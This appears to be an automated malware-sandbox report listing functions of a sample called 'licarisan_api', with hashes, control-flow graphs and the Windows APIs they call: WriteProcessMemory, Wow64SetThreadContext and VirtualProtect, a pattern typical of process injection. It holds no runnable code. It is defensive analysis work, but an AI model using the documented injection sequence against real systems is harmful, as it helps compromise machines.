                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: 98109882c5c7f1c1375aa6ef229a7b3645570b6e1452f044a586097a4846f725
                                    • Instruction ID: 3d04a27d395e48e51a6c9c73a46cda455ee9ba22b9cf41dab17f151a34bfbf16
                                    • Opcode Fuzzy Hash: 98109882c5c7f1c1375aa6ef229a7b3645570b6e1452f044a586097a4846f725
                                    • Instruction Fuzzy Hash: 5531E4F2D041546EF7104A10ED59BFB7B78EFC0710F9881FAE80995A40E73CAAC58A23
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?), ref: 004201B8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 0cd2dee5ffb09907395a8b6e0818bfec24ea02c41f48140d78a19e9205e884f3
                                    • Instruction ID: 77bfc9207910e74e27480ba8babaf3dbab6122e275df6dfddbe8dcd9bfb9c06c
                                    • Opcode Fuzzy Hash: 0cd2dee5ffb09907395a8b6e0818bfec24ea02c41f48140d78a19e9205e884f3
                                    • Instruction Fuzzy Hash: A741AFB1E052689FEB24CA14DC94AEAB7B9EF84301F1481EAD40D67241D63D6FC2CF55
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 0043025C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: bb58763c6801842cd884df31a5fddf9b9c32978f1ef520ba747addf34dc300a5
                                    • Instruction ID: 4075c7030f5a98178fc78b35fdea173907f065eef25f62e80d73637c3e9b955d
                                    • Opcode Fuzzy Hash: bb58763c6801842cd884df31a5fddf9b9c32978f1ef520ba747addf34dc300a5
                                    • Instruction Fuzzy Hash: 0F112B71D042948FEB208A10DCA4BAF7BB8AF89304F1411EAD40D56242D3398FC2CF56
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: 61bb3190126198079ceea71dc4512d4902bf5cdaa3fc606d593d4dd975b19e6b
                                    • Instruction ID: e087a1090b37ba22b4c0fd1ae312a5ddf0caf599e1dd05cb8563adf610420983
                                    • Opcode Fuzzy Hash: 61bb3190126198079ceea71dc4512d4902bf5cdaa3fc606d593d4dd975b19e6b
                                    • Instruction Fuzzy Hash: AAF02DB3D041606AF3301511AC55FDF36749FD5724F8941FBD90811141E53D8A9A86E7
                                    APIs
                                    • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 0043025C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: DefaultLocaleQuery
                                    • String ID:
                                    • API String ID: 2949231068-0
                                    • Opcode ID: ef5ac068e6e92f2813fda9ced1d7621b155711c41080f4ab687b4912409fd79f
                                    • Instruction ID: 0291b4720daeebef37745f5f1a3360ff1ff2a91a3fabe03789dbd40f267432d8
                                    • Opcode Fuzzy Hash: ef5ac068e6e92f2813fda9ced1d7621b155711c41080f4ab687b4912409fd79f
                                    • Instruction Fuzzy Hash: 180192709042688BEB348B50DC657AF7BB5AF89314F1052EED45E66281D7394EC1CF06

                                    Control-flow Graph

                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 007F22F9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 983334009-1470631180
                                    • Opcode ID: afdd83b162e3952562d753411be16f942b1e521efde50fe3138e8c9840486d8f
                                    • Instruction ID: 30b64705fa23584c3c85d65378045caddab87302b89654d0e0e502fe28d144eb
                                    • Opcode Fuzzy Hash: afdd83b162e3952562d753411be16f942b1e521efde50fe3138e8c9840486d8f
                                    • Instruction Fuzzy Hash: 04D1AA71D085A88FDB24CB14CC94BAABBB6AB84314F1481EAD50D67346DB389FC2CF51

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 0-1470631180
                                    • Opcode ID: b463970f0d89497039e7cfcfe4d07a5b5630f972d390365c723b86f7a9d61eb6
                                    • Instruction ID: 3734144da80842d56e9f490ac40656e2717cd4e40f3c60cfeecb93772f7b0d27
                                    • Opcode Fuzzy Hash: b463970f0d89497039e7cfcfe4d07a5b5630f972d390365c723b86f7a9d61eb6
                                    • Instruction Fuzzy Hash: 539135B1D081989AE721CA24DC98BFA7BBAEBC1300F1480FAD54D62281D67D5FC58F52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 638<$E$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 0-387579111
                                    • Opcode ID: c947a5f6c6faef15b0f8d9270cf409503bd818610059257ae062bec5b4e5a598
                                    • Instruction ID: a7d04d56f37adb75bb28cf199130b3e55a7e0637d5ee998a12293a881adbe0e4
                                    • Opcode Fuzzy Hash: c947a5f6c6faef15b0f8d9270cf409503bd818610059257ae062bec5b4e5a598
                                    • Instruction Fuzzy Hash: 9E714871D085A59BFB20CA14CC48BEB7BB5AF85305F08C0FAC44D56642CA7C5EC98F92

                                    Control-flow Graph

                                    control_flow_graph 2781 7f1b75-7f1ba8 2783 7f1beb-7f1c7e call 7f1c53 2781->2783 2784 7f1baa-7f2311 call 7f1bc4 Wow64SetThreadContext 2781->2784 2793 7f1c8f-7f1cda 2783->2793 2794 7f1c80-7f1c8a 2783->2794 2795 7f2318-7f384a call 7f3833 2784->2795 2796 7f1cdc-7f1ce6 2793->2796 2797 7f1ceb-7f1d08 call 7f1d09 2793->2797 2798 7f1f4b-7f1f5d call 7f1f5f 2794->2798 2811 7f384c-7f3856 2795->2811 2812 7f385b-7f38a6 call 7f3889 2795->2812 2796->2798 2797->2798 2813 7f3b17-7f3b44 call 7f3b45 2811->2813 2818 7f38a8-7f38b2 2812->2818 2819 7f38b7-7f38bd 2812->2819 2818->2813 2820 7f38c3-7f391b 2819->2820 2823 7f3922-7f39e9 2820->2823 2827 7f39eb-7f3a01 2823->2827 2828 7f3a03-7f3a13 2823->2828 2829 7f3a66-7f3a6d 2827->2829 2828->2823 2830 7f3a19-7f3a2c 2828->2830 2832 7f3aaf-7f3afb 2829->2832 2833 7f3a6f-7f3a7b call 7f3a7d 2829->2833 2830->2823 2831 7f3a32-7f3a42 2830->2831 2834 7f3a44-7f3a4e 2831->2834 2835 7f3a50 2831->2835 2837 7f3b0d 2832->2837 2838 7f3afd-7f3b07 2832->2838 2833->2832 2839 7f3a5a-7f3a60 2834->2839 2835->2839 2837->2813 2838->2820 2838->2837 2839->2829
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 983334009-1470631180
                                    • Opcode ID: 2fa419f07c77daf7b8228eda2a7785d092c42e85ca4c169e05ed10ecbfc0d40b
                                    • Instruction ID: 07a0c009ee393c90484ec07a362f9c7772d2daa91b5cb53d01012b800c3d30ac
                                    • Opcode Fuzzy Hash: 2fa419f07c77daf7b8228eda2a7785d092c42e85ca4c169e05ed10ecbfc0d40b
                                    • Instruction Fuzzy Hash: 8A610CB1D086A8DEE7218B24DC48BEABB79EB85310F0440FAD54D66341C67D4BC5CF62

                                    Control-flow Graph

                                    control_flow_graph 2841 7ef990-7ef9d1 2842 7ef9df-7efa36 2841->2842 2843 7ef9d3-7ef9dd 2841->2843 2846 7efa38-7efa42 2842->2846 2847 7efa44 2842->2847 2844 7efa4e-7efa55 2843->2844 2848 7efa57-7efa63 2844->2848 2849 7efa65 2844->2849 2846->2844 2847->2844 2850 7efa76-7efab7 WriteProcessMemory 2848->2850 2849->2850 2852 7efabe-7efbf2 2850->2852 2853 7efab9-7f384a call 7f3833 2850->2853 2858 7efbf4-7efbfe 2852->2858 2859 7efc03-7efc4e 2852->2859 2875 7f384c-7f3856 2853->2875 2876 7f385b-7f38a6 call 7f3889 2853->2876 2861 7efebf-7efed7 call 7efed3 2858->2861 2866 7efc5f-7efcc3 2859->2866 2867 7efc50-7efc5a 2859->2867 2873 7efed9-7efef8 2861->2873 2874 7efcca-7efd91 call 7efcde 2866->2874 2867->2861 2877 7efefe-7effa6 call 7effad 2873->2877 2878 7f080b-7f082a call 7f0823 2873->2878 2912 7efdab-7efdbb 2874->2912 2913 7efd93-7efda9 2874->2913 2880 7f3b17-7f3b44 call 7f3b45 2875->2880 2892 7f38a8-7f38b2 2876->2892 2893 7f38b7-7f38bd 2876->2893 2896 7f0831-7f089e 2878->2896 2897 7f082c call 7f0839 2878->2897 2892->2880 2898 7f38c3-7f391b 2893->2898 2903 7f08af-7f08fa call 7f08d2 2896->2903 2904 7f08a0-7f08aa 2896->2904 2897->2896 2909 7f3922-7f39e9 2898->2909 2920 7f08fc-7f0906 2903->2920 2921 7f090b-7f09a2 call 7f09a4 2903->2921 2907 7f0b6b-7f0b92 call 7f0b80 call 7f0b93 2904->2907 2928 7f39eb-7f3a01 2909->2928 2929 7f3a03-7f3a13 2909->2929 2912->2874 2919 7efdc1-7efdd4 2912->2919 2918 7efe0e-7efe15 2913->2918 2922 7efe57-7efe6a call 7efe6b 2918->2922 2923 7efe17-7efe55 2918->2923 2919->2874 2926 7efdda-7efdea 2919->2926 2920->2907 2921->2907 2922->2861 2923->2861 2933 7efdec-7efdf6 2926->2933 2934 7efdf8 2926->2934 2936 7f3a66-7f3a6d 2928->2936 2929->2909 2937 7f3a19-7f3a2c 2929->2937 2940 7efe02-7efe08 2933->2940 2934->2940 2943 7f3aaf-7f3afb 2936->2943 2944 7f3a6f-7f3a7b call 7f3a7d 2936->2944 2937->2909 2941 7f3a32-7f3a42 2937->2941 2940->2918 2945 7f3a44-7f3a4e 2941->2945 2946 7f3a50 2941->2946 2949 7f3b0d 2943->2949 2950 7f3afd-7f3b07 2943->2950 2944->2943 2951 7f3a5a-7f3a60 2945->2951 2946->2951 2949->2880 2950->2898 2950->2949 2951->2936
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 007EFAAF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 3559483778-1470631180
                                    • Opcode ID: aeb2d352934d302cb29a201b852559e95f7a5102fb8154f512ce6a659375c7ef
                                    • Instruction ID: c709e9f7eb1b4b1a59a1af7688ca13a5339640ef7f4cc91ab9be0e9dc71fa50e
                                    • Opcode Fuzzy Hash: aeb2d352934d302cb29a201b852559e95f7a5102fb8154f512ce6a659375c7ef
                                    • Instruction Fuzzy Hash: AD5127B1D091E88AE721C715DC58BEA7BB5AB86310F1480FAD04E66781C6BC5FC58F62

                                    Control-flow Graph

                                    control_flow_graph 2956 7f16b2-7f176b call 7f1746 2960 7f17ae-7f180c 2956->2960 2961 7f176d-7f17a9 2956->2961 2962 7f181f-7f1834 2960->2962 2963 7f180e-7f181a 2960->2963 2973 7f22eb-7f2311 Wow64SetThreadContext 2961->2973 2966 7f1847-7f1866 2962->2966 2967 7f1836-7f1842 2962->2967 2965 7f1b10-7f1b17 2963->2965 2971 7f1b1d-7f1ba8 call 7f1b75 2965->2971 2972 7f1beb-7f1c7e call 7f1c53 2965->2972 2969 7f1879-7f188b 2966->2969 2970 7f1868-7f1874 2966->2970 2967->2965 2975 7f189e-7f1907 2969->2975 2976 7f188d-7f1899 2969->2976 2970->2965 2971->2972 2990 7f1baa-7f1be6 call 7f1bc4 2971->2990 2991 7f1c8f-7f1cda 2972->2991 2992 7f1c80-7f1c8a 2972->2992 2979 7f2318-7f384a call 7f3833 2973->2979 2984 7f190d-7f1957 2975->2984 2985 7f1b04-7f1b0a 2975->2985 2976->2965 3023 7f384c-7f3856 2979->3023 3024 7f385b-7f38a6 call 7f3889 2979->3024 2986 7f1968-7f1979 2984->2986 2985->2965 2993 7f197f-7f198f 2986->2993 2994 7f1a1a-7f1a6b 2986->2994 2990->2973 2997 7f1cdc-7f1ce6 2991->2997 2998 7f1ceb-7f1d08 call 7f1d09 2991->2998 3001 7f1f4b-7f1f5d call 7f1f5f 2992->3001 2993->2994 3002 7f1995-7f19e6 call 7f19c3 2993->3002 2999 7f1a6d-7f1a77 2994->2999 3000 7f1a79-7f1ad0 2994->3000 2997->3001 2998->3001 3006 7f1ae8-7f1aef 2999->3006 3008 7f1ade 3000->3008 3009 7f1ad2-7f1adc 3000->3009 3025 7f1a0c 3002->3025 3026 7f19e8-7f1a0a 3002->3026 3015 7f1aff 3006->3015 3016 7f1af1-7f1afd 3006->3016 3008->3006 3009->3006 3015->2985 3016->2965 3027 7f3b17-7f3b44 call 7f3b45 3023->3027 3034 7f38a8-7f38b2 3024->3034 3035 7f38b7-7f38bd 3024->3035 3025->2986 3026->3025 3029 7f1a13 3026->3029 3029->2994 3034->3027 3036 7f38c3-7f391b 3035->3036 3039 7f3922-7f39e9 3036->3039 3043 7f39eb-7f3a01 3039->3043 3044 7f3a03-7f3a13 3039->3044 3045 7f3a66-7f3a6d 3043->3045 3044->3039 3046 7f3a19-7f3a2c 3044->3046 3048 7f3aaf-7f3afb 3045->3048 3049 7f3a6f-7f3a7b call 7f3a7d 3045->3049 3046->3039 3047 7f3a32-7f3a42 3046->3047 3050 7f3a44-7f3a4e 3047->3050 3051 7f3a50 3047->3051 3053 7f3b0d 3048->3053 3054 7f3afd-7f3b07 3048->3054 3049->3048 3055 7f3a5a-7f3a60 3050->3055 3051->3055 3053->3027 3054->3036 3054->3053 3055->3045
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 983334009-1470631180
                                    • Opcode ID: ed5e4b98d152ac195e70f9d8a0f729cc312236136c7a3cd42276b67d2bb83c10
                                    • Instruction ID: 9af72b8f6b88c1bf7c23c0fa23f56631b8ce560b968293fe3f7a7770f020995d
                                    • Opcode Fuzzy Hash: ed5e4b98d152ac195e70f9d8a0f729cc312236136c7a3cd42276b67d2bb83c10
                                    • Instruction Fuzzy Hash: D45129B2D081E89AE7218629DC48BEB7F799B81310F1440F9D58D67341C6BD4FCACB62
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: 638<$E$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 544645111-387579111
                                    • Opcode ID: eb600545453fe36506a7444a9516f61b9dee91236dc7066d2096ca509fae7269
                                    • Instruction ID: 706dcf55066b4740364da7c51d2542e25eabd76fbacc23c04447aa80f2cfae19
                                    • Opcode Fuzzy Hash: eb600545453fe36506a7444a9516f61b9dee91236dc7066d2096ca509fae7269
                                    • Instruction Fuzzy Hash: 4251B3B1C086A49EFB208A14DC44BDB7BB9EB95314F04C0FAD54C56641CA7D9FC98FA2

                                    Control-flow Graph

                                    control_flow_graph 3337 7f225c-7f229f 3338 7f22ad 3337->3338 3339 7f22a1-7f22ab 3337->3339 3340 7f22b7-7f22be 3338->3340 3339->3340 3341 7f22ce 3340->3341 3342 7f22c0-7f22cc 3340->3342 3343 7f22df-7f2311 Wow64SetThreadContext 3341->3343 3342->3343 3345 7f2318-7f384a call 7f3833 3343->3345 3353 7f384c-7f3856 3345->3353 3354 7f385b-7f38a6 call 7f3889 3345->3354 3355 7f3b17-7f3b44 call 7f3b45 3353->3355 3360 7f38a8-7f38b2 3354->3360 3361 7f38b7-7f38bd 3354->3361 3360->3355 3362 7f38c3-7f391b 3361->3362 3365 7f3922-7f39e9 3362->3365 3369 7f39eb-7f3a01 3365->3369 3370 7f3a03-7f3a13 3365->3370 3371 7f3a66-7f3a6d 3369->3371 3370->3365 3372 7f3a19-7f3a2c 3370->3372 3374 7f3aaf-7f3afb 3371->3374 3375 7f3a6f-7f3a7b call 7f3a7d 3371->3375 3372->3365 3373 7f3a32-7f3a42 3372->3373 3376 7f3a44-7f3a4e 3373->3376 3377 7f3a50 3373->3377 3379 7f3b0d 3374->3379 3380 7f3afd-7f3b07 3374->3380 3375->3374 3381 7f3a5a-7f3a60 3376->3381 3377->3381 3379->3355 3380->3362 3380->3379 3381->3371
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 007F22F9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 983334009-1470631180
                                    • Opcode ID: 0329f8587d6e2dff89767006ec3897e131fc56f8e14a279d1aa91a691c2d076e
                                    • Instruction ID: f933cdd4093289db74cbe3b85e784f61e38394a5bbd73ad9c50b9d5e58f13dc6
                                    • Opcode Fuzzy Hash: 0329f8587d6e2dff89767006ec3897e131fc56f8e14a279d1aa91a691c2d076e
                                    • Instruction Fuzzy Hash: 4A51B671D085A88AE7218614DC48BEABBB6AB85310F1480F9D54D66341C7BD5BC68F62
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004361CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: 638<$E$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 544645111-387579111
                                    • Opcode ID: 4e237dc89208f8eaa97a1204fc66f3665fb871a989283381a120952dfd1368d2
                                    • Instruction ID: dee7749602e52ec1bda2d3af3831d77f98eb98408824dccde88255bca1aa750d
                                    • Opcode Fuzzy Hash: 4e237dc89208f8eaa97a1204fc66f3665fb871a989283381a120952dfd1368d2
                                    • Instruction Fuzzy Hash: B641F7B1C086A59AFB20CA15CC44BEB7BF5AB85314F04C0FAD48C56241CA7C5EC98F96
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004361CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: 638<$E$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 544645111-387579111
                                    • Opcode ID: e7a23173d0ec743700dd91cc2bc45caf3d4f11828fced7b5d37f812f4945f1a8
                                    • Instruction ID: 21507ac6968a8fa0d9c6df9afb75aee7d2314607abf1e2ce916fccb047d1017e
                                    • Opcode Fuzzy Hash: e7a23173d0ec743700dd91cc2bc45caf3d4f11828fced7b5d37f812f4945f1a8
                                    • Instruction Fuzzy Hash: 4A4117A1C082A49AF7608615DC44BEB7FB9EB45314F04C0FAD48C56681DABD5FC98FE2

                                    Control-flow Graph

                                    control_flow_graph 3877 7d1788-7f2311 Wow64SetThreadContext 3880 7f2318-7f384a call 7f3833 3877->3880 3888 7f384c-7f3856 3880->3888 3889 7f385b-7f38a6 call 7f3889 3880->3889 3890 7f3b17-7f3b44 call 7f3b45 3888->3890 3895 7f38a8-7f38b2 3889->3895 3896 7f38b7-7f38bd 3889->3896 3895->3890 3897 7f38c3-7f391b 3896->3897 3900 7f3922-7f39e9 3897->3900 3904 7f39eb-7f3a01 3900->3904 3905 7f3a03-7f3a13 3900->3905 3906 7f3a66-7f3a6d 3904->3906 3905->3900 3907 7f3a19-7f3a2c 3905->3907 3909 7f3aaf-7f3afb 3906->3909 3910 7f3a6f-7f3a7b call 7f3a7d 3906->3910 3907->3900 3908 7f3a32-7f3a42 3907->3908 3911 7f3a44-7f3a4e 3908->3911 3912 7f3a50 3908->3912 3914 7f3b0d 3909->3914 3915 7f3afd-7f3b07 3909->3915 3910->3909 3916 7f3a5a-7f3a60 3911->3916 3912->3916 3914->3890 3915->3897 3915->3914 3916->3906
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 007F22F9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 983334009-1470631180
                                    • Opcode ID: 48bb7151ea35984d100120f047ce79df5e4e7d838e842fb2c3ad98765cf39c9a
                                    • Instruction ID: 5930414c22dbcfce0d56dbfa7522605c45fc72ed060f25bfdf388d58180d9807
                                    • Opcode Fuzzy Hash: 48bb7151ea35984d100120f047ce79df5e4e7d838e842fb2c3ad98765cf39c9a
                                    • Instruction Fuzzy Hash: A341E9B1D081D89AE7218628DC48BEF7F7AAB81710F1440F9D54D66341C6BD4FDA8F62

                                    Control-flow Graph

                                    control_flow_graph 3918 7ef36f-7efab7 WriteProcessMemory 3920 7efabe-7efbf2 3918->3920 3921 7efab9-7f384a call 7f3833 3918->3921 3926 7efbf4-7efbfe 3920->3926 3927 7efc03-7efc4e 3920->3927 3943 7f384c-7f3856 3921->3943 3944 7f385b-7f38a6 call 7f3889 3921->3944 3929 7efebf-7efed7 call 7efed3 3926->3929 3934 7efc5f-7efcc3 3927->3934 3935 7efc50-7efc5a 3927->3935 3941 7efed9-7efef8 3929->3941 3942 7efcca-7efd91 call 7efcde 3934->3942 3935->3929 3945 7efefe-7effa6 call 7effad 3941->3945 3946 7f080b-7f082a call 7f0823 3941->3946 3980 7efdab-7efdbb 3942->3980 3981 7efd93-7efda9 3942->3981 3948 7f3b17-7f3b44 call 7f3b45 3943->3948 3960 7f38a8-7f38b2 3944->3960 3961 7f38b7-7f38bd 3944->3961 3964 7f0831-7f089e 3946->3964 3965 7f082c call 7f0839 3946->3965 3960->3948 3966 7f38c3-7f391b 3961->3966 3971 7f08af-7f08fa call 7f08d2 3964->3971 3972 7f08a0-7f08aa 3964->3972 3965->3964 3977 7f3922-7f39e9 3966->3977 3988 7f08fc-7f0906 3971->3988 3989 7f090b-7f09a2 call 7f09a4 3971->3989 3975 7f0b6b-7f0b92 call 7f0b80 call 7f0b93 3972->3975 3996 7f39eb-7f3a01 3977->3996 3997 7f3a03-7f3a13 3977->3997 3980->3942 3987 7efdc1-7efdd4 3980->3987 3986 7efe0e-7efe15 3981->3986 3990 7efe57-7efe6a call 7efe6b 3986->3990 3991 7efe17-7efe55 3986->3991 3987->3942 3994 7efdda-7efdea 3987->3994 3988->3975 3989->3975 3990->3929 3991->3929 4001 7efdec-7efdf6 3994->4001 4002 7efdf8 3994->4002 4004 7f3a66-7f3a6d 3996->4004 3997->3977 4005 7f3a19-7f3a2c 3997->4005 4008 7efe02-7efe08 4001->4008 4002->4008 4011 7f3aaf-7f3afb 4004->4011 4012 7f3a6f-7f3a7b call 7f3a7d 4004->4012 4005->3977 4009 7f3a32-7f3a42 4005->4009 4008->3986 4013 7f3a44-7f3a4e 4009->4013 4014 7f3a50 4009->4014 4017 7f3b0d 4011->4017 4018 7f3afd-7f3b07 4011->4018 4012->4011 4019 7f3a5a-7f3a60 4013->4019 4014->4019 4017->3948 4018->3966 4018->4017 4019->4004
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 007EFAAF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 3559483778-1470631180
                                    • Opcode ID: 4a8852089da40e10f4bfa471410b8ceb3067e0d0834c854dac3357bdd94c8e1a
                                    • Instruction ID: 31e98b2b1b55bdb614183efcedd898e3b471c350e5d680642cf3801dea87b9ce
                                    • Opcode Fuzzy Hash: 4a8852089da40e10f4bfa471410b8ceb3067e0d0834c854dac3357bdd94c8e1a
                                    • Instruction Fuzzy Hash: FA4118B1D081E89AE7218629DC48BEB7BB99B85310F1480F9D14D66741C6BD8BC5CF62

                                    Control-flow Graph

                                    control_flow_graph 4024 7f1bc4-7f2311 Wow64SetThreadContext 4026 7f2318-7f384a call 7f3833 4024->4026 4034 7f384c-7f3856 4026->4034 4035 7f385b-7f38a6 call 7f3889 4026->4035 4036 7f3b17-7f3b44 call 7f3b45 4034->4036 4041 7f38a8-7f38b2 4035->4041 4042 7f38b7-7f38bd 4035->4042 4041->4036 4043 7f38c3-7f391b 4042->4043 4046 7f3922-7f39e9 4043->4046 4050 7f39eb-7f3a01 4046->4050 4051 7f3a03-7f3a13 4046->4051 4052 7f3a66-7f3a6d 4050->4052 4051->4046 4053 7f3a19-7f3a2c 4051->4053 4055 7f3aaf-7f3afb 4052->4055 4056 7f3a6f-7f3a7b call 7f3a7d 4052->4056 4053->4046 4054 7f3a32-7f3a42 4053->4054 4057 7f3a44-7f3a4e 4054->4057 4058 7f3a50 4054->4058 4060 7f3b0d 4055->4060 4061 7f3afd-7f3b07 4055->4061 4056->4055 4062 7f3a5a-7f3a60 4057->4062 4058->4062 4060->4036 4061->4043 4061->4060 4062->4052
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 007F22F9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 983334009-1470631180
                                    • Opcode ID: 33260525472a1380cc0af65e326b9cc806291cab59e4e294d333b41034a3d6fc
                                    • Instruction ID: de1e48aba4591682714f9645aab192730c46c56c0173584b362a3c3a2a87b3ba
                                    • Opcode Fuzzy Hash: 33260525472a1380cc0af65e326b9cc806291cab59e4e294d333b41034a3d6fc
                                    • Instruction Fuzzy Hash: E641E9B1D081D89AE7218624DC48BEA7F7AABD1310F1440F9D54D66341C6BD4BDACF62
                                    APIs
